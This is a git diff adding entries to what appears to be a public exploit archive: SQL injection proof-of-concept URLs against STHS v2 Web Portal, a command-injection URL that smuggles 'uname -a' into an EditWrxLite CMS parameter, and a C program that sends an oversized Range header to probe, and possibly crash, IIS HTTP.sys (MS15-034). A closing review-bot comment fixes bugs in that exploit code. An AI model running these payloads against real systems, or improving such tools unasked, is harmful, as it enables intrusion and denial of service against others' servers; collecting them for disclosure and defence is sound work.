diff --git a/files.csv b/files.csv
index ebcb3190d..398e810d2 100755
--- a/files.csv
+++ b/files.csv
@@ -33169,3 +33169,8 @@ id,file,description,date,author,platform,type,port
 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0
 36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
+36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0
+36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
diff --git a/platforms/cgi/webapps/36772.txt b/platforms/cgi/webapps/36772.txt
new file mode 100755
index 000000000..71045e21e
--- /dev/null
+++ b/platforms/cgi/webapps/36772.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51995/info
+
+EditWrxLite CMS is prone to a remote command-execution vulnerability.
+
+Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application.
+
+http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a|
\ No newline at end of file
diff --git a/platforms/php/webapps/36769.txt b/platforms/php/webapps/36769.txt
new file mode 100755
index 000000000..9ec66dd05
--- /dev/null
+++ b/platforms/php/webapps/36769.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51991/info
+
+STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected.
+
+ http://www.example.com/prospects.php?team=[SQLi]'
\ No newline at end of file
diff --git a/platforms/php/webapps/36770.txt b/platforms/php/webapps/36770.txt
new file mode 100755
index 000000000..de2d31fd7
--- /dev/null
+++ b/platforms/php/webapps/36770.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51991/info
+
+STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/prospect.php?team=[SQLi]'
\ No newline at end of file
diff --git a/platforms/php/webapps/36771.txt b/platforms/php/webapps/36771.txt
new file mode 100755
index 000000000..89c127ca3
--- /dev/null
+++ b/platforms/php/webapps/36771.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51991/info
+
+STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/team.php?team=[SQLi]'
\ No newline at end of file
diff --git a/platforms/windows/dos/36773.c b/platforms/windows/dos/36773.c
new file mode 100755
index 000000000..2bf910a44
--- /dev/null
+++ b/platforms/windows/dos/36773.c
@@ -0,0 +1,108 @@
+/*
+ UNTESTED - MS15-034 Checker
+
+ THE BUG:
+
+ 8a8b2112 56 push esi
+ 8a8b2113 6a00 push 0
+ 8a8b2115 2bc7 sub eax,edi
+ 8a8b2117 6a01 push 1
+ 8a8b2119 1bca sbb ecx,edx
+ 8a8b211b 51 push ecx
+ 8a8b211c 50 push eax
+ 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
+
+ ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
+
+ BY: john.b.hale@gmai.com
+ Twitter: @rhcp011235
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int connect_to_server(char *ip)
+{
+ int sockfd = 0, n = 0;
+
+ struct sockaddr_in serv_addr;
+ struct hostent *server;
+
+ if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+ {
+ printf("\n Error : Could not create socket \n");
+ return 1;
+ }
+
+ memset(&serv_addr, '0', sizeof(serv_addr));
+ serv_addr.sin_family = AF_INET;
+ serv_addr.sin_port = htons(80);
+ if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)
+ {
+ printf("\n inet_pton error occured\n");
+ return 1;
+ }
+ if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
+ {
+ printf("\n Error : Connect Failed \n");
+ return 1;
+ }
+
+ return sockfd;
+}
+
+
+int main(int argc, char *argv[])
+{
+ int n = 0;
+ int sockfd;
+ char recvBuff[1024];
+
+ // Check server
+ char request[] = "GET / HTTP/1.0\r\n\r\n";
+
+ // our evil buffer
+ char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
+
+
+ if(argc != 2)
+ {
+ printf("\n Usage: %s \n",argv[0]);
+ return 1;
+ }
+
+ printf("[*] Audit Started\n");
+ sockfd = connect_to_server(argv[1]);
+ write(sockfd, request, strlen(request));
+ read(sockfd, recvBuff, sizeof(recvBuff)-1);
+
+ if (!strstr(recvBuff,"Microsoft"))
+ {
+ printf("[*] NOT IIS\n");
+ exit(1);
+ }
+
+ sockfd = connect_to_server(argv[1]);
+ write(sockfd, request1, strlen(request1));
+ read(sockfd, recvBuff, sizeof(recvBuff)-1);
+ if (strstr(recvBuff,"Requested Range Not Satisfiable"))
+ {
+ printf("[!!] 
Looks VULN\n");
+ exit(1);
+ } else if(strstr(recvBuff,"The request has an invalid header name")) {
+ printf("[*] Looks Patched");
+} else
+ printf("[*] Unexpected response, cannot discern patch status");
+
+
+
+
+}
\ No newline at end of file
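Review bot: `main` never checks the value returned by `connect_to_server`, and the helper reports every failure with `return 1;`, a value `main` cannot tell from a real descriptor, so after a failed socket(), inet_pton() or connect() the request is written to file descriptor 1 and `recvBuff` is scanned without ever having been filled. Independently, the byte count from `read()` is discarded and `recvBuff` (declared without an initializer) is never NUL-terminated, so the `strstr` calls in the "Microsoft" and "Requested Range Not Satisfiable" checks read uninitialized bytes and can run past the end of the buffer; the descriptor from the first connection is also never closed before the second one is opened. Have the helper return -1 on each failure path, bail out of `main` when the result is negative, terminate the buffer from the count `read()` returns, and `close()` each socket once its reply has been read (the same pattern applies to the second request). Minor: `memset(&serv_addr, '0', sizeof(serv_addr))` fills the struct with the character '0' rather than zero — `memset(&serv_addr, 0, sizeof(serv_addr))` — and the locals `n` (in both functions) and `server` are unused.
```c
int connect_to_server(char *ip)
{
    // … unchanged: socket()/inet_pton()/connect() with their error messages …
    // on each failure path:  return -1;   /* 1 is a valid descriptor number */
    return sockfd;
}

    // … unchanged: argument check and the two request buffers …
    sockfd = connect_to_server(argv[1]);
    if (sockfd < 0)
        return 1;
    write(sockfd, request, strlen(request));
    ssize_t got = read(sockfd, recvBuff, sizeof(recvBuff) - 1);
    close(sockfd);
    if (got < 0)
        got = 0;
    recvBuff[got] = '\0';   /* strstr() needs a terminated string */
    // … unchanged: the "Microsoft" check; repeat the same pattern for request1 …
```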